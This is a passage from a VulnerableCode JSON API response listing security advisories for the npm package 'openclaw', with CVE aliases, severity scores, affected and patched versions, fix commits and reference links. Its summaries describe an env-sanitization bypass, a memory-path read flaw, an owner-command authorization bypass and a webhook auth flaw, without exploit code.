"VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35617", "GHSA-52q4-3xjc-6778" ], "risk_score": 1.9, "exploitability": "0.5", "weighted_severity": "3.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a2p8-ydn6-3bbr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89853?format=api", "vulnerability_id": "VCID-a2wx-7b8h-c3h1", "summary": "OpenClaw: PIP_INDEX_URL and UV_INDEX_URL bypass host exec env sanitization and redirect Python package-index traffic\n## Summary\n`PIP_INDEX_URL` and `UV_INDEX_URL` bypass host exec env sanitization and redirect Python package-index traffic\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still allows Python package-index env redirection through host exec, but scope should stay limited to approved or allowlisted package-management exec paths, not arbitrary remote execution.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d` — 2026-03-31T09:53:32+09:00\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41391", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04648", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04661", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04675", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41391" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7ggg-pvrf-458v", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7ggg-pvrf-458v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41391", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41391" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-bypass-in-package-index-url-handling", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-bypass-in-package-index-url-handling" }, { "reference_url": "https://github.com/advisories/GHSA-7ggg-pvrf-458v", "reference_id": "GHSA-7ggg-pvrf-458v", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7ggg-pvrf-458v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41391", "GHSA-7ggg-pvrf-458v" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a2wx-7b8h-c3h1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89810?format=api", "vulnerability_id": "VCID-a46u-tnbh-fyhs", "summary": "OpenClaw: QMD memory_get restricts reads to canonical or indexed memory paths\n## Summary\n\nThe QMD backend `memory_get` read path accepted arbitrary workspace Markdown paths that were inside the workspace but outside the canonical memory locations or indexed QMD result set.\n\n## Impact\n\nWhen the QMD backend was enabled, a caller with access to `memory_get` could read arbitrary `*.md` files under the configured workspace root, even when those files were not canonical memory files and had not been returned by QMD search. Severity remains low because exploitation requires access to the memory tool surface and is limited to workspace Markdown files, but it bypassed the intended memory-path policy.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` restricts QMD reads to canonical memory paths or previously indexed QMD workspace paths. Workspace containment alone is no longer sufficient.\n\nVerified in `v2026.4.15`:\n\n- `extensions/memory-core/src/memory/qmd-manager.ts` rejects non-default workspace Markdown paths unless they match an indexed QMD workspace read path.\n- `extensions/memory-core/src/memory/qmd-manager.test.ts` covers QMD session search-result reads and the read-path restriction behavior.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `37d5971db36491d5050efd42c333cbe0b98ed292` via PR #66026\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/37d5971db36491d5050efd42c333cbe0b98ed292", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/37d5971db36491d5050efd42c333cbe0b98ed292" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/66026", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/66026" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f934-5rqf-xx47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f934-5rqf-xx47" }, { "reference_url": "https://github.com/advisories/GHSA-f934-5rqf-xx47", "reference_id": "GHSA-f934-5rqf-xx47", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f934-5rqf-xx47" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109881?format=api", "purl": "pkg:npm/openclaw@2026.4.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15" } ], "aliases": [ "GHSA-f934-5rqf-xx47" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a46u-tnbh-fyhs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90199?format=api", "vulnerability_id": "VCID-a4jz-y9s4-zkfg", "summary": "OpenClaw: Owner-enforced commands could accept wildcard channel senders as command owners\n## Impact\n\nOpenClaw deployments before `2026.4.21` could treat a non-owner sender as authorized for owner-enforced slash commands when all of the following were true:\n\n- a channel plugin declared `commands.enforceOwnerForCommands: true`;\n- the channel accepted wildcard inbound senders with `allowFrom: [\"*\"]`;\n- no explicit `commands.ownerAllowFrom` was configured.\n\nIn that state, `src/auto-reply/command-auth.ts` reused the channel inbound wildcard as part of the command-owner decision. A sender who was not the owner could therefore pass the owner-command gate for commands such as `/send`, `/config`, or `/debug` on the affected channel.\n\nThe issue is limited to the command-owner authorization axis. It does not by itself grant owner-only tool access, host/sandbox access, or gateway administrator scope.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected versions: `<= 2026.4.20`\n- Patched version: `2026.4.21`\n\nThe latest public release, `2026.4.21`, contains the fix.\n\n## Patches\n\nThe fix requires a concrete owner identity or internal operator-admin scope when a plugin enforces owner-only commands. Wildcard channel `allowFrom` no longer implies wildcard command ownership.\n\nFix commits:\n\n- `2aa93d44a1b2c7058c371f261fda2b5d4de4a882` on `main`\n- `995febb7b1e811ff6a1df5b18c22de94103f4c9f` in the `2026.4.21` release line\n\n## Workarounds\n\nUpgrade to `openclaw@2026.4.21` or later. Before upgrading, avoid wildcard/open-DM sender policy on owner-enforced channels, or configure `commands.ownerAllowFrom` to the intended owner identities.\n\n## Credits\n\nOpenClaw thanks @zsxsoft for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44991", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08975", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08973", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08993", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44991" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2aa93d44a1b2c7058c371f261fda2b5d4de4a882", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/2aa93d44a1b2c7058c371f261fda2b5d4de4a882" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/995febb7b1e811ff6a1df5b18c22de94103f4c9f", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/995febb7b1e811ff6a1df5b18c22de94103f4c9f" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c28g-vh7m-fm7v", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c28g-vh7m-fm7v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44991", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44991" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-owner-enforced-commands-via-wildcard-channel-senders", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-owner-enforced-commands-via-wildcard-channel-senders" }, { "reference_url": "https://github.com/advisories/GHSA-c28g-vh7m-fm7v", "reference_id": "GHSA-c28g-vh7m-fm7v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c28g-vh7m-fm7v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/111520?format=api", "purl": "pkg:npm/openclaw@2026.4.21", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.21" } ], "aliases": [ "CVE-2026-44991", "GHSA-c28g-vh7m-fm7v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a4jz-y9s4-zkfg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91439?format=api", "vulnerability_id": "VCID-aja9-wzp2-kbcj", "summary": "OpenClaw: Google Chat app-url webhook auth accepted non-deployment add-on principals\n## Summary\nGoogle Chat app-url webhook verification accepted add-on principals outside the intended deployment binding.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` 